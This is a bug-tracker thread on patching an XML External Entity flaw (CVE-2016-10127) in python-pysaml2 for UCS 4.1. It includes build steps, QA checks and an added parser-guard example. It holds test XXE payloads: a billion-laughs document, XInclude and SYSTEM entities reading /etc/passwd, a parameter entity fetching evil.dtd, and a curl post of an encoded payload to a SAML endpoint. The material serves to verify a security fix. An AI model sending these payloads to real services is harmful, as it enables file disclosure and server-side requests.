Univention Bugzilla – Bug 43393
python-pysaml2: XML External Entity issue (4.1)
Last modified: 2019-06-06 12:55:08 CEST
Created attachment 8362
CVE-2016-10127_fix-xxe-in-xml-parsing.patch

Upstream Debian Jessie package version 2.0.0-1+deb8u1 fixes this issue:

Matias P. Brutti discovered that python-pysaml2, a Python implementation of the Security Assertion Markup Language 2.0, did not correctly sanitize the XML messages it handled. This allowed a remote attacker to perform XML External Entity attacks, leading to a wide range of exploits (CVE-2016-10127)

In UCS 4.1 we have version 2.4.0-2.
*** Bug 43315 has been marked as a duplicate of this bug. ***
We need to cherry-pick https://packages.debian.org/de/jessie/python-defusedxml.
* repo_admin.py -U -d jessie -r 4.1-0-0 -s errata4.1-4 -p defusedxml
  Successful build
  Package: defusedxml
  Version: 0.4.1-2.1.201702142211
  Branch: ucs_4.1-0
  Scope: errata4.1-4
* repo_admin.py --cherrypick --release 4.1-0 \
      --releasedest 4.1-0 --dest errata4.1-4 --package python-pysaml2
  Package: python-pysaml2
  Version: 2.4.0-2.4.201702142305
  Branch: ucs_4.1-0
  Scope: errata4.1-4
  = /var/univention/buildsystem2/logs/ucs_4.1-0-0-errata4.1-4/python-pysaml2_2.4.0-2.4.201702142305.log.bz2
* Comparing the log file with the UCS 4.1-0 build looks ok. The 6 new test cases run successfully.
* python-defusedxml has been added to the ucs_4.1-0-ucs4.1-4.txt trigger list as described in the Wiki (Errata-Updates). The package is now listed in buildsystem2/cd-contents/ucs_4.1-4_*.maintained
* Advisories: defusedxml.yaml, python-pysaml2.yaml
OK: grep ElementTree $(dpkg -L python-pysaml2 | sort) 2>/dev/null | grep fromstring | grep -v defusedxml

OK:
>>> import saml2
>>> xml = '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n<!ELEMENT lolz (#PCDATA)>\n<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n]>\n<lolz>&lol1;</lolz>\n'
>>> saml2.create_class_from_xml_string(None, xml)
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
  File "/usr/lib/python2.7/dist-packages/saml2/__init__.py", line 86, in create_class_from_xml_string
    tree = defusedxml.ElementTree.fromstring(xml_string)
  File "/usr/lib/python2.7/dist-packages/defusedxml/common.py", line 159, in fromstring
    parser.feed(text)
  File "/usr/lib/python2.7/xml/etree/ElementTree.py", line 1641, in feed
    self._parser.Parse(data, 0)
  File "/usr/lib/python2.7/dist-packages/defusedxml/ElementTree.py", line 95, in defused_entity_decl
    raise EntitiesForbidden(name, value, base, sysid, pubid, notation_name)
defusedxml.common.EntitiesForbidden: EntitiesForbidden(name='lol', system_id=None, public_id=None)

OK: not possible to get file contents with e.g.:
<root xmlns:xi="http://www.w3.org/2001/XInclude">\n  <xi:include href="/etc/passwd" parse="text" />\n</root>

OK: SAML login and logout via UMC still works

OK: ucs-test -s saml -E dangerous
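The traceback above shows where the fix bites: defusedxml hooks expat's EntityDeclHandler, so the document is rejected while the internal DTD subset is still being read, before any entity is expanded or a SYSTEM reference is fetched. The following is an added example (not code from this bug report, from pysaml2 or from defusedxml) that rebuilds that guard with only the standard library, so it runs without python-defusedxml installed. The function and exception names (parse_defused, rejected_entity, dtd_rejected, EntitiesForbidden, DTDForbidden) are this example's own; the LOLZ payload is the one from the test session above, the other three documents are constructed here.

```python
"""Stdlib re-implementation of the defusedxml entity guard (added example).

Only xml.parsers.expat and xml.etree.ElementTree are used; nothing is
fetched from disk or network because the guard raises before expat ever
gets to resolve a SYSTEM entity.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat as expat


class EntitiesForbidden(ValueError):
    """Raised for any entity declaration, internal or external, before use."""

    def __init__(self, name, system_id, is_parameter_entity):
        super().__init__(f"entity declaration forbidden: {name!r} (SYSTEM={system_id!r})")
        self.name = name
        self.system_id = system_id
        self.is_parameter_entity = bool(is_parameter_entity)


class DTDForbidden(ValueError):
    """Raised when forbid_dtd=True and the document carries any DOCTYPE."""


def parse_defused(xml_text, forbid_dtd=False):
    """Parse xml_text into an Element while refusing entity declarations.

    The handlers run while expat reads the internal subset, so a
    billion-laughs declaration, a SYSTEM general entity or a parameter
    entity pointing at an external DTD all abort the parse at the
    declaration itself (the same point as the EntitiesForbidden
    traceback in this bug).
    """
    builder = ET.TreeBuilder()
    parser = expat.ParserCreate()

    def on_entity_decl(name, is_parameter_entity, value, base,
                       system_id, public_id, notation_name):
        raise EntitiesForbidden(name, system_id, is_parameter_entity)

    def on_unparsed_entity_decl(name, base, system_id, public_id, notation_name):
        raise EntitiesForbidden(name, system_id, False)

    def on_external_entity_ref(context, base, system_id, public_id):
        # Defence in depth: unreachable when every declaration is refused,
        # but guarantees expat never opens a file or URL on our behalf.
        raise EntitiesForbidden(context, system_id, False)

    def on_start_doctype(name, system_id, public_id, has_internal_subset):
        raise DTDForbidden(f"DOCTYPE {name!r} not allowed")

    parser.EntityDeclHandler = on_entity_decl
    parser.UnparsedEntityDeclHandler = on_unparsed_entity_decl
    parser.ExternalEntityRefHandler = on_external_entity_ref
    if forbid_dtd:
        parser.StartDoctypeDeclHandler = on_start_doctype
    parser.StartElementHandler = builder.start
    parser.EndElementHandler = builder.end
    parser.CharacterDataHandler = builder.data

    parser.Parse(xml_text, True)
    return builder.close()


# Constructed samples. LOLZ is the payload from the test session in this
# bug; it expands to only ten "lol"s, so expanding it here is harmless.
LOLZ = (
    '<?xml version="1.0"?>\n<!DOCTYPE lolz [\n<!ENTITY lol "lol">\n'
    '<!ELEMENT lolz (#PCDATA)>\n'
    '<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">\n'
    ']>\n<lolz>&lol1;</lolz>\n'
)
XXE_FILE = (
    '<?xml version="1.0"?><!DOCTYPE r [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<r>&xxe;</r>'
)
XXE_PARAM = (
    '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ '
    '<!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> %payload;]>'
)
BENIGN = (
    '<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_x">'
    '<samlp:Status/></samlp:Response>'
)


def unguarded_text(xml_text):
    """What the stock ElementTree parser does: internal entities are expanded."""
    return ET.fromstring(xml_text).text


def rejected_entity(xml_text):
    """Name of the entity whose declaration got the document rejected, or None."""
    try:
        parse_defused(xml_text)
    except EntitiesForbidden as exc:
        return exc.name
    return None


def dtd_rejected(xml_text):
    """True if the strict (forbid_dtd=True) parser refuses the document."""
    try:
        parse_defused(xml_text, forbid_dtd=True)
    except DTDForbidden:
        return True
    return False
```

parse_defused(LOLZ) stops at the very first declaration (`lol`), before `lol1` is even seen, which is why the rejected name in the bug's traceback is `lol` and not `lol1`; the parameter-entity document used in the later comment is refused at `payload` the same way, so no request to localhost:8000 is ever made. For a SAML endpoint the forbid_dtd=True variant is the sensible default, since no legitimate SAMLResponse carries a DOCTYPE at all.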
Just for myself:

# Python 2.7: base64-encode the DTD payload and URL-quote it for the form body
import urllib
urllib.quote('''<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % payload SYSTEM "http://localhost:8000/evil.dtd"> %payload;]>'''.encode('base64').strip())

curl -ik 'https://xen3.school.local/univention/saml/' -H 'Content-Type: application/x-www-form-urlencoded' --data 'SAMLResponse=PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48IURPQ1RZUEUgcm9vdCBbIDwh%0ARU5USVRZICUgcGF5bG9hZCBTWVNURU0gImh0dHA6Ly9sb2NhbGhvc3Q6ODAwMC9ldmlsLmR0ZCI%2B%0AICVwYXlsb2FkO10%2B'
<http://errata.software-univention.de/ucs/4.1/398.html> <http://errata.software-univention.de/ucs/4.1/400.html>